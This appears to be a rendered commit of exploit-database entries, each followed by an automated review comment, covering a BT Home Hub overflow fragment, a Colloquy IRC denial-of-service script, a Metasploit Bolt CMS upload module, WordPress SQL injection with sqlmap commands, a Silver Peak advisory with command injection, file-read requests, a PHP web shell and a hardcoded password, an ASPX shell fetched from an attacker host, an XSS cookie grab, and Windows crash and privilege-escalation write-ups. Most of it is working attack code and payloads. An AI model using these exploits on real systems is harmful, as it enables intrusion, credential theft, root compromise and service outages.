BT Home Hub is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data before copying it to an insufficiently sized buffer.
An attacker can exploit this issue to gain elevated privileges and execute arbitrary code with root privileges. Failed exploit attempts will likely crash the affected application.
BT Home Hub 3.0b is vulnerable; other versions may also be affected.
#
*******************************************************************************
#
*******************************************************************************
# ***************** These files are licensed GPLv2. ****************
# ******************* See included LICENSE for more info.
*******************
#
*******************************************************************************
#
*******************************************************************************
# ************************ From your leet hacking cr3w
************************
# ******************************* *******************************
# ********************************** at
**********************************
# ************ http://www.tacnetsol.com ***********
#
*******************************************************************************
# Copyright (c) 2013 Zachary Cutlip
# Tactical Network Solutions, LLC
class MsearchCrash:
def __init__(self,overflowbuffer):
self.__msearch_text__=\
"M-SEARCH * HTTP/1.1\r\n"+\
"HOST:239.255.255.250:1900\r\n"+\
"ST:uuid:"+str(overflowbuffer)+"\r\n"\
"MX:2\r\n"+\
'MAN:"ssdp:discover"'+"\r\n\r\n"
def __str__(self):
return self.__msearch_text__
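Review bot: the file is a fragment: `MsearchCrash` only builds the M-SEARCH text with the oversized `ST:uuid:` value, nothing constructs the object or sends it, and the banner block is broken where extraction wrapped lines (a `#` alone on a line followed by a bare run of asterisks), so the file will not parse as Python as shown; either restore the original or mark it as a partial listing. Inside `__init__`, the `"ST:uuid:"+str(overflowbuffer)+"\r\n"\` line has no `+` before `"MX:2\r\n"` and relies on adjacent-literal concatenation, which is worth making explicit for consistency with the surrounding lines. Since the message targets the SSDP multicast address and port (239.255.255.250:1900), the defensive point to record is that UPnP discovery should not be reachable from the WAN side of the hub, and unusually long `ST:` headers in M-SEARCH traffic are the thing to alert on.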

platforms/multiple/dos/38208.py Executable file
@ -0,0 +1,122 @@
source: http://www.securityfocus.com/bid/57255/info
Colloquy is prone to a remote denial-of-service vulnerability.
Successful exploits may allow the attacker to cause the application to crash, resulting in denial-of-service conditions.
Colloquy 1.3.5 and 1.3.6 are vulnerable.
###################################################################################
# # #
# # H O W - T O #
# # #
# #######################
#
# Provide the Target: Server, Port, Nickname and the script will deliver
# the payload...
#
# [!USE/]$ ./<file>.py -t <server> -p <port> -n <nickname>
#
###################################################################################
from argparse import ArgumentParser
from time import sleep
import socket
shellcode = {
# One Shot <3
'one_shot' : [ \
"687474703a2f2f782f2e2425235e26402426402426232424242425232426",
"23242623262340262a232a235e28242923404040245e2340242625232323",
"5e232526282a234026405e242623252623262e2f2e2f2e2e2f2e2e2f2324",
"2e24" ],
# 1.3.5
'1_3_5' : [ \
"687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
"292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
"74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c"
"7573657228292c2873656c6563742532302d2d687474703a2f2f" ],
# 1.3.6 - ( Requires Sending 25 Times )
'1_3_6' : [ \
"687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
"292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
"74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c",
"7573657228292c2873656c6563742532302d2d687474703a2f2f" ],
}
def own( sock, target, sc_key='one_shot' ):
sc = ''.join( shellcode[sc_key] )
targ = ''.join( ''.join( [ hex( ord( ch ) ) for ch in target ] ).split( '0x' ) )
msg = "505249564d534720{}203a{}0d0a".format( targ, sc )
if sc_key not in '1_3_6':
sock.send( bytes.fromhex( msg ) )
else:
try:
for x in range( 1, 26 ):
sock.send( bytes.fromhex( msg ) )
sleep( .64 )
except:
print( 'FAILED!')
def connect( uri, port, target, sc_key ):
sock = socket.socket()
try:
ret = sock.connect_ex(( uri, int( port ) ))
sock.recv(8096)
except:
print( "\t[-] Failed To Connect To {}".format( uri ) )
exit()
sock.send( b"\x4e\x49\x43\x4b\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x0d\x0a" )
sock.send( b"\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48\x45\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x3c\x33\x0d\x0a" )
while True:
host_data = str( sock.recv( 8096 ).strip() )
if ' 396 ' in host_data:
print( '\t[+] Connection Successful Sending Payload To {}'.format( target ) )
own( sock, target, sc_key )
sock.send( b'QUIT\r\n' )
sock.close()
break
try:
msg = host_data.split()
if msg[0].lower() is 'ping':
sock.send( b"PONG {}\r\n".format( msg[1] ) )
continue
except:
pass
print( '\t[!] Payload Sent, Target Should Drop Shortly <3' )
if __name__ == '__main__':
parser = ArgumentParser( description='#legion Colloquy IRC DoS; Requires At Least A Nick To Target' )
parser.add_argument( '-t', '--target', dest='target', default='localhost', help="IRCD Server Uri To Connect On" )
parser.add_argument( '-p', '--port', dest='port', default=6667, help="Port To Connect On" )
parser.add_argument( '-n', '--nick', dest='nick', metavar='NICK', help="Nick To Target" )
parser.add_argument( '-s', '--shellcode', dest='shellcode', default='one_shot',
help='Shell Code To Use, ( one_shot, 1_3_5, 1_3_6 )' )
args = parser.parse_args()
if args.nick is None:
parser.print_help()
exit()
connect( args.target, args.port, args.nick, args.shellcode.strip() )
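Review bot: the return value of connect_ex in connect() is stored in ret and never checked; connect_ex reports failure as a non-zero error code instead of raising, so a refused connection is not noticed until sock.recv fails and the "Failed To Connect" message is printed for the wrong reason. Test `if ret != 0` directly after the call. The PING handler in the receive loop is dead code: `msg[0].lower() is 'ping'` compares object identity rather than equality, and `b"PONG {}\r\n".format(...)` calls format on a bytes object, which Python 3 does not provide; both failures are swallowed by the bare `except: pass`, so they never surface. Minor: `sc_key not in '1_3_6'` is a substring test on a string, not a key comparison, and happens to work only for the three keys defined in the shellcode dict.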

platforms/php/remote/38196.rb Executable file

@ -0,0 +1,177 @@
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(
info,
'Name' => 'CMS Bolt File Upload Vulnerability',
'Description' => %q{
Bolt CMS contains a flaw that allows an authenticated remote
attacker to execute arbitrary PHP code. This module was
tested on version 2.2.4.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Tim Coen', # Vulnerability Disclosure
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
],
'References' =>
[
['URL', 'http://blog.curesec.com/article/blog/Bolt-224-Code-Execution-44.html']
],
'DisclosureDate' => 'Aug 17 2015',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [['Bolt 2.2.4', {}]],
'DefaultTarget' => 0
))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to the web application', '/']),
OptString.new('FOLDERNAME', [true, 'The theme path to the web application (default: base-2014)', 'base-2014']),
OptString.new('USERNAME', [true, 'The username to authenticate with']),
OptString.new('PASSWORD', [true, 'The password to authenticate with'])
], self.class)
end
def check
cookie = bolt_login(username, password)
return Exploit::CheckCode::Detected unless cookie
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'bolt'),
'cookie' => cookie
)
if res && res.code == 200 && res.body.include?('Bolt 2.2.4</b>: Sophisticated, lightweight & simple CMS')
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def username
datastore['USERNAME']
end
def password
datastore['PASSWORD']
end
def fname
datastore['FOLDERNAME']
end
def bolt_login(user, pass)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'bolt', 'login')
)
fail_with(Failure::Unreachable, 'No response received from the target.') unless res
session_cookie = res.get_cookies
vprint_status("#{peer} - Logging in...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'bolt', 'login'),
'cookie' => session_cookie,
'vars_post' => {
'username' => user,
'password' => pass,
'action' => 'login'
}
)
return res.get_cookies if res && res.code == 302 && res.redirection.to_s.include?('/bolt')
nil
end
def get_token(cookie, fname)
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname),
'cookie' => cookie
)
if res && res.code == 200 && res.body =~ / name="form\[_token\]" value="(.+)" /
return Regexp.last_match[1]
end
nil
end
def rename_payload(cookie, payload, fname)
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, 'async', 'renamefile'),
'vars_post' => {
'namespace' => 'theme',
'parent' => fname,
'oldname' => "#{payload}.png",
'newname' => "#{payload}.php"
},
'cookie' => cookie
)
return true if res && res.code == 200 && res.body.include?('1')
nil
end
def exploit
vprint_status("#{peer} - Authenticating using #{username}:#{password}")
cookie = bolt_login(username, password)
fail_with(Failure::NoAccess, 'Unable to login. Verify USERNAME/PASSWORD or TARGETURI.') if cookie.nil?
vprint_good("#{peer} - Authenticated with Bolt.")
token = get_token(cookie, fname)
fail_with(Failure::Unknown, 'No token found.') if token.nil?
vprint_good("#{peer} - Token \"#{token}\" found.")
vprint_status("#{peer} - Preparing payload...")
payload_name = Rex::Text.rand_text_alpha_lower(10)
data = Rex::MIME::Message.new
data.add_part(payload.encoded, 'image/png', nil, "form-data; name=\"form[FileUpload][]\"; filename=\"#{payload_name}.png\"")
data.add_part("#{token}", nil, nil, 'form-data; name="form[_token]"')
post_data = data.to_s
vprint_status("#{peer} - Uploading payload...")
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri, 'bolt', 'files', 'theme', fname),
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => post_data,
'cookie' => cookie
)
fail_with(Failure::Unknown, 'Unable to upload payload.') unless res && res.code == 302
vprint_good("#{peer} - Uploaded the payload.")
rename = rename_payload(cookie, payload_name, fname)
fail_with(Failure::Unknown, 'No renamed filename.') if rename.nil?
php_file_name = "#{payload_name}.php"
payload_url = normalize_uri(target_uri.path, 'theme', fname, php_file_name)
vprint_status("#{peer} - Parsed response.")
register_files_for_cleanup(php_file_name)
vprint_status("#{peer} - Executing the payload at #{payload_url}.")
send_request_cgi(
'uri' => payload_url,
'method' => 'GET'
)
end
end
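Review bot: the success test in rename_payload, `res.body.include?('1')`, is too weak; any 200 response whose body contains the character 1 (an HTML error page with a timestamp, for instance) would be reported as a successful rename and exploit would go on to request a PHP file that does not exist. Compare against the exact body the async/renamefile endpoint returns. Inconsistent URI building: get_token and the upload request in exploit pass target_uri to normalize_uri while every other request passes target_uri.path; use target_uri.path throughout. Minor: the token regex `value="(.+)" ` is greedy and will overmatch if other attributes follow on the same line; check returns CheckCode::Detected when the login fails, where CheckCode::Unknown describes "could not verify" better; and rename_payload returns true or nil where true/false is idiomatic.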

platforms/php/webapps/38187.txt Executable file

@ -0,0 +1,112 @@
# Exploit Title: WordPress: cp-reservation-calendar 1.1.6 SQLi injection]
# Date: 2015-09-15
# Google Dork: Index of /wp-content/plugins/cp-reservation-calendar/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Software Link: https://downloads.wordpress.org/plugin/cp-reservation-calendar.zip
# Version: 1.1.6
# OWASP Top10: A1-Injection
A vulnerability has been detected in the WordPress cp reservation calendar Plugin v1.6.
The vulnerability allows remote attackers to inject SQL commands.
The sql injection vulnerability is located in the `dex_reservations.php` file.
Remote attackers are able to execute own sql commands by manipulation of requested parameters.
The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 8.6.
Exploitation of the remote sql injection web vulnerability requires no user interaction or privilege web-application user account.
Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.
============================
vulnerable function code...
============================
function dex_reservations_calendar_load2() {
global $wpdb;
if ( ! isset( $_GET['dex_reservations_calendar_load2'] ) || $_GET['dex_reservations_calendar_load2'] != '1' )
return;
@ob_clean();
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Pragma: no-cache");
//following line is vulnerable...
$calid = str_replace (TDE_RESERVATIONCAL_PREFIX, "",$_GET["id"]);
$query = "SELECT * FROM ".TDE_RESERVATIONCALENDAR_DATA_TABLE." where ".TDE_RESERVATIONDATA_IDCALENDAR."='".$calid."'";
$row_array = $wpdb->get_results($query,ARRAY_A);
foreach ($row_array as $row)
{
$d1 = date("m/d/Y", strtotime($row[TDE_RESERVATIONDATA_DATETIME_S]));
$d2 = date("m/d/Y", strtotime($row[TDE_RESERVATIONDATA_DATETIME_E]));
echo $d1."-".$d2."\n";
echo $row[TDE_RESERVATIONDATA_TITLE]."\n";
echo $row[TDE_RESERVATIONDATA_DESCRIPTION]."\n*-*\n";
}
exit();
}
The following URL executes vulnerable function:
http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1
------------------------------------------------------------------------------------
POC using sqlmap tool::::
python sqlmap.py --url="http://localhost/wordpress/?action=dex_reservations_calendar_load2&dex_reservations_calendar_load2=1&id=1"
-p id --level=5 --risk=3 --dbms="MySQL" --dbs
##########################################################################
The following URL is too vulnerable
http://localhost/wordpress/?action=dex_reservations_check_posted_data
post parameters::::
-------------------------------------
dex_reservations_post=1&dex_item=1
------------------------------------
An unauthenticated user can use the following URL to inject malicious SQL code.
[dex_item] on POST parameter is vulnerable
======================
vulnerable code
=====================
is located in `dex_reservations.php`
function code..
function dex_reservations_get_option ($field, $default_value)
{
global $wpdb, $dex_option_buffered_item, $dex_option_buffered_id;
if ($dex_option_buffered_id == CP_CALENDAR_ID)
$value = $dex_option_buffered_item->$field;
else
{
$myrows = $wpdb->get_results( "SELECT * FROM ".DEX_RESERVATIONS_CONFIG_TABLE_NAME." WHERE id=".CP_CALENDAR_ID );
$value = $myrows[0]->$field;
$dex_option_buffered_item = $myrows[0];
$dex_option_buffered_id = CP_CALENDAR_ID;
}
if ($value == '' && $dex_option_buffered_item->calendar_language == '')
$value = $default_value;
return $value;
}
When this function is called the defined CP_CALENDAR_ID must contains an integer but it isn't validating the parameter
[ CP_CALENDAR_ID ]
----------------------------------------------------------------------------
POC using sqlmap tool::::
python sqlmap.py --url="http://localhost/wordpress/?action=dex_reservations_check_posted_data" --data="dex_reservations_post=1&dex_item=1"
-p dex_item --dbms="MySQL" --level=5 --risk=3
#############
time-line
2015-03-01: vulnerability found
2015-03-09: reported to vendor
2015-03-21-: released cp_reservation_calendar v1.1.7
2015-09-15: full disclosure
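Review bot: both vulnerable snippets build their SQL by string concatenation ($calid in dex_reservations_calendar_load2, the CP_CALENDAR_ID constant in dex_reservations_get_option) and the advisory offers no remediation beyond the "released cp_reservation_calendar v1.1.7" timeline entry; a sentence stating that the id should be cast to an integer and both queries routed through $wpdb->prepare() with a %d placeholder would make the fix clear to readers. The version numbers disagree: the title and Version line say 1.1.6, the description says "Plugin v1.6". Style: the Exploit Title ends with a stray "]", and "The following URL is too vulnerable" presumably means "also vulnerable".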

platforms/php/webapps/38197.txt Executable file

@ -0,0 +1,214 @@
( , ) (,
. '.' ) ('. ',
). , ('. ( ) (
(_,) .'), ) _ _,
/ _____/ / _ \ ____ ____ _____
\____ \==/ /_\ \ _/ ___\/ _ \ / \
/ \/ | \\ \__( <_> ) Y Y \
/______ /\___|__ / \___ >____/|__|_| /
\/ \/.-. \/ \/:wq
(x.0)
'=.|w|.='
_=''"''=.
presents..
Silver Peak VXOA Multiple Vulnerabilities
Affected versions: Silver Peak VX < 6.2.11
PDF:
http://www.security-assessment.com/files/documents/advisory/Silverpeak-Advisory-Final.pdf
+-----------+
|Description|
+-----------+
The Silver Peak VX virtual appliance running VXOA before version 6.2.11
contains a number of security vulnerabilities, including command
injection, unauthenticated file read, mass assignment, shell upload, and
hardcoded credentials. By combining these vulnerabilities, an attacker
may remotely obtain root privileges on the underlying host.
+------------+
|Exploitation|
+------------+
==Command Injection==
A user with administrative access to the REST JSON interface of the VX
web server may execute arbitrary commands on the operating system. The
injection point lies in the "snmp" call, which does not sanitise the
"auth_key" parameter before including it in an executed command string.
The following command injection PoC writes the user's id to a file on
the filesystem.
[Command Injection PoC]
POST /rest/json/snmp HTTP/1.1
Host: [HOST]
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 368
Cookie: connect.sid=[VALID];
{"access":{"rocommunity":"public"},"listen":{"enable":true},"traps":{"trap_community":"public","enable":true},"auto_launch":true,"sysdescr":"",
"syscontact":"","syslocation":"","v3":{"users":{"admin":{"hash_type":"sha","auth_key":"a;echo
`id` >
/var/tmp/cmd_inj","self":"admin","privacy_key":"","privacy_type":"aes-128","enable":false}}},"encAuth":false,"encPri":false}
==Unauthenticated File Read==
A user with the ability to access the VX web server interface may make
an unauthenticated call to a web interface function that allows them to
read arbitrary files on the disk with the permission of the web server
user "apache". Two functions are affected by this vulnerability,
"save_file.php" and "save_config_file.php".
[Unauthenticated File Read PoC]
curl -sk
"https://[HOST]/6.2.5.0_52054/php/save_file.php?ftype=log&fname=../../etc/passwd"
OR
curl -sk
"https://[HOST]/6.2.5.0_52054/php/save_config_file.php?filename=../../../../../../../../etc/passwd"
==Mass Assignment==
A user with access to the REST JSON interface of the VX web server may
alter undocumented parameters of the "users" call, allowing them to
change a user's login shell to bash. This can be used to evade the
limited subshell enforced by the SSH server on the appliance.
[Mass assignment PoC]
POST /rest/json/users HTTP/1.1
Host: [HOST]
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 366
Cookie: connect.sid=[VALID];
{"users":{"basic":{"self":"basic","enable":true,"gid":0,"password":"[SNIP]","shell":"/bin/bash"}},[SNIP
other users]}}
==Shell Upload==
A user with monitor or administrative access to the web interface of the
VX web server may upload a PHP shell in order to execute arbitrary
commands as the web server user "apache". A POST request containing the
PHP shell is made to the "configdb_file.php" endpoint. This uploads the
shell to a directory with a randomly generated name corresponding to the
user's SOAP interface session. This random value may be obtained from
"home.php", and the uploaded shell accessed within that directory. The
following PoC details uploading the shell, obtaining the SOAP directory
name, and using the shell.
[Shell upload PoC]
POST /6.2.5.0_52054/php/configdb_file.php?seenform=1 HTTP/1.1
Host: [HOST]
Cookie: PHPSESSID=[VALID];
Content-Type: multipart/form-data;
boundary=---------------------------18932870311933452824851992207
Content-Length: 301
-----------------------------18932870311933452824851992207
Content-Disposition: form-data; name="userfile"; filename="shell.php"
Content-Type: text/html
<?php
$cmd = $_GET["cmd"];
$output = shell_exec($cmd);
echo "$output";
?>
-----------------------------18932870311933452824851992207
#End of request
$curl -sk -b 'PHPSESSID=[VALID]'
"https://[HOST]/6.2.5.0_52054/php/home.php" | grep "flowFile"
var flowFile =
"/opt/tms/lib/web/content/webui/php/temp/soap/wcupfu36lkvkyutxc2h1swnxsnz8rsffijnhod9zmwr270oreuoatajxcfq71sf/";
$curl -sk
"https://[HOST]/6.2.5.0_52054/php/temp/soap/wcupfu36lkvkyutxc2h1swnxsnz8rsffijnhod9zmwr270oreuoatajxcfq71sf/shell.php?cmd=id"
uid=48(apache) gid=48(apache) groups=48(apache)
==Hardcoded Account==
The "spsadmin" account is predefined in the VX appliance, and is hidden
from user account lists in the web and subshell interfaces. The account
has a hardcoded password of "Silverpeak123", and cannot be logged into
through the regular web interface, or the subshell over SSH. However,
the account can log in via the web JSON interface, and execute JSON API
calls with administrative privileges. This can include creating new
users, with which an attacker may successfully log into the SSH or web
interfaces, and also exploiting the Command Injection bug detailed
earlier in this advisory. The following PoC details the request and
credentials used to obtain a valid REST cookie:
[Hardcoded account login PoC]
POST /rest/json/login HTTP/1.1
Host: [host]
Content-Type: application/json; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 46
{"user":"spsadmin","password":"Silverpeak123"}
==Subshell Breakout==
An administrative user with access to the enable menu of the login
subshell may enter a hardcoded string to obtain a bash shell on the
operating system.
[Subshell Breakout POC]
silverpeak > en
silverpeak # _spsshell
[admin@silverpeak root]# id
uid=0(admin) gid=0(root) groups=0(root)
+----------+
| Solution |
+----------+
Users of the 6.2.x branch should upgrade to version 6.2.11 of VXOA in
order to protect against these issues. Silver Peak has advised that
users of the 7.2.x branch are only vulnerable to the command injection
vulnerability, which will be patched in version 7.3.
+-------------------+
|Disclosure Timeline|
+-------------------+
01/04/2015 - Email sent to info address asking for a security contact.
09/04/2015 - Email sent to info and security addresses asking for a
security contact.
21/04/2015 - Email sent to CEO regarding security contact.
21/04/2015 - Response from CEO providing security contact details.
22/04/2015 - Email sent to security contact asking for PGP key.
22/04/2015 - Received PGP key, sent advisory.
22/04/2015 - Email received confirming receipt of advisory.
22/06/2015 - Email sent asking for update on advisory.
23/06/2015 - Vendor details fixes in place, states that all issues have
been fixed in 6.2.11.0, and only the command injection remains unfixed
in the 7.2.x version.
17/07/2015 - Email sent regarding resolution of unfixed issue.
17/07/2015 - Received response stating the command injection issue is
only relevant to customers who have disabled shell access.
21/07/2015 - Email sent asking for clarification on the vendor stance.
21/07/2015 - Vendor states command injection vulnerability is only an
issue for customers with shell access disabled as they otherwise have
the ability to execute commands through the shell, and that the issue
will be fixed in release 7.3.
09/09/2015 - Public advisory release.
+-----------------------------+
|About Security-Assessment.com|
+-----------------------------+
Security-Assessment.com is a leading team of Information Security
consultants specialising in providing high quality Information Security
services to clients throughout the Asia Pacific region. Our clients
include some of the largest globally recognised companies in areas such
as finance, telecommunications, broadcasting, legal and government. Our
aim is to provide the very best independent advice and a high level of
technical expertise while creating long and lasting professional
relationships with our clients.
Security-Assessment.com is committed to security research and
development, and its team continues to identify and responsibly publish
vulnerabilities in public and private software vendor's products.
Members of the Security-Assessment.com R&D team are globally recognised
through their release of whitepapers and presentations related to new
security research.
For further information on this issue or any of our service offerings,
contact us:
Web www.security-assessment.com
Email info () security-assessment.com
Phone +64 4 470 1650
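Review bot: the "Affected versions: Silver Peak VX < 6.2.11" line in the header understates the scope given later; the Solution and timeline sections say the 7.2.x branch remains vulnerable to the command injection until 7.3, so 7.2.x should be listed for that issue. In the Command Injection PoC the JSON body is wrapped across three lines in the middle of the auth_key value, so the request as shown does not match its Content-Length of 368 and cannot be reproduced verbatim; mark it as wrapped for display. The Hardcoded Account section gives no guidance for customers who cannot yet upgrade; stating whether the spsadmin account can be disabled, or at least recommending that the REST JSON interface not be reachable from untrusted networks, would help defenders prioritise.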

platforms/php/webapps/38204.txt Executable file

@ -0,0 +1,27 @@
source: http://www.securityfocus.com/bid/57242/info
Prizm Content Connect is prone to an arbitrary file-upload vulnerability because it fails to adequately validate files before uploading them.
An attacker may leverage this issue to upload arbitrary files to the affected computer; this can result in an arbitrary code execution within the context of the vulnerable application.
Prizm Content Connect 5.1 is vulnerable; other versions may also be affected.
Proof of concept
First, the attacker causes the Prizm Content Connect software to download
the malicious ASPX file:
http://www.example.com/default.aspx?document=http://attacker.example.org/aspxshell.aspx
The resulting page discloses the filename to which the ASPX file was
downloaded, e.g.:
Document Location: C:\Project\
Full Document Path: C:\Project\ajwyfw45itxwys45fgzomrmv.aspx
Temp Location: C:\tempcache\
The attacker then requests the ASPX shell from the root of the website:
http://www.example.com/ajwyfw45itxwys45fgzomrmv.aspx
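Review bot: this file is placed under platforms/php/webapps, but the PoC targets an ASP.NET application (default.aspx, an uploaded .aspx file), so the platform classification looks wrong; asp or windows would fit. The text gives no fix or affected-version information beyond 5.1, and the PoC output already shows the root cause: the URL supplied in the document parameter is fetched and stored under the web root with its .aspx extension preserved (Full Document Path: C:\Project\...aspx). A remediation sentence, restricting document to local or allow-listed sources and storing fetched content outside the web root with a non-executable extension, would make the entry useful to defenders.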

platforms/php/webapps/38207.txt Executable file

@ -0,0 +1,12 @@
source: http://www.securityfocus.com/bid/57254/info
Quick.Cms and Quick.Cart are prone to a cross-site scripting vulnerability because they fail to sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
The following products are vulnerable:
Quick.Cms 5.0
Quick.Cart 6.0
http://www.example.com/admin.php/')"></select><script>alert(document.cookie);</script>/
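Review bot: the PoC carries the script in the path portion of the admin.php URL, but the text only says the products "fail to sanitize user-supplied input" and never states where that path is reflected; naming the reflecting output and the fix (HTML-encoding the request path before echoing it into markup) would make this actionable. The list of vulnerable products also gives no fixed versions.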


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/57256/info
The Gallery plugin for WordPress is prone to an arbitrary file-access vulnerability.
Remote attackers can exploit this issue to read arbitrary files. This may lead to further attacks.
Gallery 3.8.3 is vulnerable; other versions may also be affected.
http://www.example.com/wp-content/plugins/gallery-plugin/gallery-plugin.php?filename_1=[AFR]
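Review bot: the [AFR] placeholder in the PoC URL is never defined, and the entry names no fixed version; spell out that the placeholder is the path of the file to be read and, since the vendor fix is not on the page, note the remediation of validating filename_1 against the set of expected file names and rejecting path separators. The file header for this entry is also missing from the rendered commit, so the platform and id cannot be checked against the PoC.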


@ -0,0 +1,41 @@
'''
********************************************************************************************
# Exploit Title: Total Commander 32bit SEH Overwrite.
# Date: 8/27/2015
# Exploit Author: Un_N0n
# Software Vendor: http://www.ghisler.com/
# Software Link: http://www.ghisler.com/download.htm
# Version: 8.52
# Tested on: Windows 8 x64(64 BIT)
********************************************************************************************
[Info:]
EAX 00106541
ECX FFFFFEFA
EDX 0031E941
EBX 04921F64
ESP 001065FC
EBP 41414141
ESI 04930088
EDI 0031E9B0
EIP 41414141
SEH chain of main thread, item 0
Address=001065FC
SE handler=41414141
'''
[Steps to Produce the Crash]:
1- Open up 'TOTALCMD.EXE'.
2- Goto Files -> Change Attributes.
3- In time field paste in contents of 'Crash.txt'.
~ Software will crash b/c SEH Overwrite.
[Code for CRASH.txt]
file = open("crash.txt",'w')
file.write("A"*5000)
file.close()
->After Reporting,
Vendor has released(bugfix release) a new version(8.52a[9th SEPT 2015]).
**********************************************************************************************
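Review bot: the header block is wrapped in a Python ''' docstring while the steps and the three-line crash generator that follow are plain text, so the file neither runs as Python nor reads as a plain advisory; either keep the generator as the only code and comment out the rest, or drop the docstring quotes. The file name is inconsistent: the generator writes crash.txt, step 3 says 'Crash.txt' and the heading says CRASH.txt (harmless on Windows, confusing to read). "Tested on: Windows 8 x64" sits next to a "32bit SEH Overwrite" title; saying that the 32-bit build of Total Commander 8.52 was tested on 64-bit Windows would remove the ambiguity. The vendor fix (8.52a, 9 Sept 2015) belongs in the header next to Version.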


@ -0,0 +1,39 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=468
Windows: User Mode Font Driver Thread Permissions EoP
Platform: Windows 10 Build 10130
Class: Elevation of Privilege
Summary:
The host process for the UMFD runs as a normal user but with a heavily restrictive process DACL. Its possible execute arbitrary code within the context of the process because its possible to access the processes threads leading to local EoP.
Description:
NOTE: This was tested on the latest available build on Windows 10. I dont know if the final version will change the functionality to fix this vulnerability.
When a custom font is used in Windows 10 the User Mode Font Driver comes into play. This is initialized by a call from the kernel into the user sessions winlogon process which in turn spawns a new copy of fontdrvhost.exe. The process is started inside an appcontainer heavily restricting what resources it could access if a font bug was able to compromise it. However win32k exposes some additional calls to the UMFD for its own purposes, some of which are potentially dangerous. For that reason (presumably) winlogon creates the process with a specific DACL limiting access to the process and initial thread to SYSTEM only.
Theres a few problems with this approach, firstly its still running in the context of the user and includes the users environment variables such as PATH. This might mean if any badly written code later relies on the drive mapping or PATH there could be issues. More serious however is the specified DACL only applies to the process object and the initial thread object, but not to any subsequent thread. Therefore those threads get the default DACL from the process token (which is never changed) and are marked as owned by the current user, so the DACL could be rewritten anyway. This is a problem as with write access to the threads its possible to change their context and redirect execution to an arbitrary location. As the token is a lowbox token this can even be done in low integrity processes such as IE PM.
The exploitation is made trickier by the fact that you cant directly read or write the process memory. Still one thing you could do is redirect the thread to LoadLibraryW and pass it the known address of a string. This can either be a string in a loaded library and rely on the path environment variable to allow it to be resolved or in something like the GDI heap.
Once in the UMFD process you can then send some of the specific Win32k escape codes. For example theres one currently called UmfdEscEngCreateFile which will open (for read or write) a couple of files in system32. The open is done in kernel mode, with no forced access check (even though an impersonation is performed) and the handle returned to user mode. This is dangerous for a number of reasons, specifically that the NTFS driver will mark the file as having create symbolic link permissions because its opened in kernel mode which means the caller could set a file symbolic link. Then it could reopen the file and it would be able create an arbitrary file on disk. This hasnt been completely tested however but its an example of a dangerous call, of course it could just be a vestigial feature which will be removed in release builds as the code is pretty dangerous and doesnt even work as expected.
This issue could probably be fixed in a few ways, firstly the default token DACL should be set so that it maintains the security, assuming this is possible. Also youd probably need to set OWNER_RIGHTS SID otherwise the user could just open the thread and rewrite its DACL. Also not using the actual users environment would probably be a good idea although not necessarily a complete fix. Finally presumably the process mitigation to only allow signed modules could be enabled which would complicate exploitation especially in the presence of CFG.
Proof of Concept:
Ive provided a PoC which just crashes the fontdrvhost process at a predictable address. Its only built for 32 bit version of Windows 10 but presumably it would work on 64 bit version as well. The password for the archive is "password".
1) Copy the PoC to a directory
2) Execute the PoC, if it wasnt already a new instance of fontdrvhost.exe should have started. You might want to attach a debugger at this point.
3) Click the Do Exploit button, if at this point the fontdrvhost process doesnt crash open a new copy of the PoC just to kick the threads inside the process.
Expected Result:
Its not possible to influence the fontdrvhost process.
Observed Result:
Thread execution redirected to an arbitrary address of 0x55555555.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/38198.zip
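Review bot: two sections are headed "Proof of Concept:", one describing the PoC and its steps and one holding only the archive link; rename the second (for example "PoC download") so the link is not mistaken for the write-up. The Summary says the host process "runs as a normal user", while the Description says the DACL limits access to SYSTEM only; the Description later clarifies that only the process object and the initial thread get that DACL, so the Summary should say that directly. The NOTE line refers to "the latest available build" although the Platform line already pins build 10130; repeat the build number there, since "latest" will date quickly.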


@ -0,0 +1,38 @@
Source: https://code.google.com/p/google-security-research/issues/detail?id=461
Windows: NtUserGetClipboardAccessToken Token Leak Redux
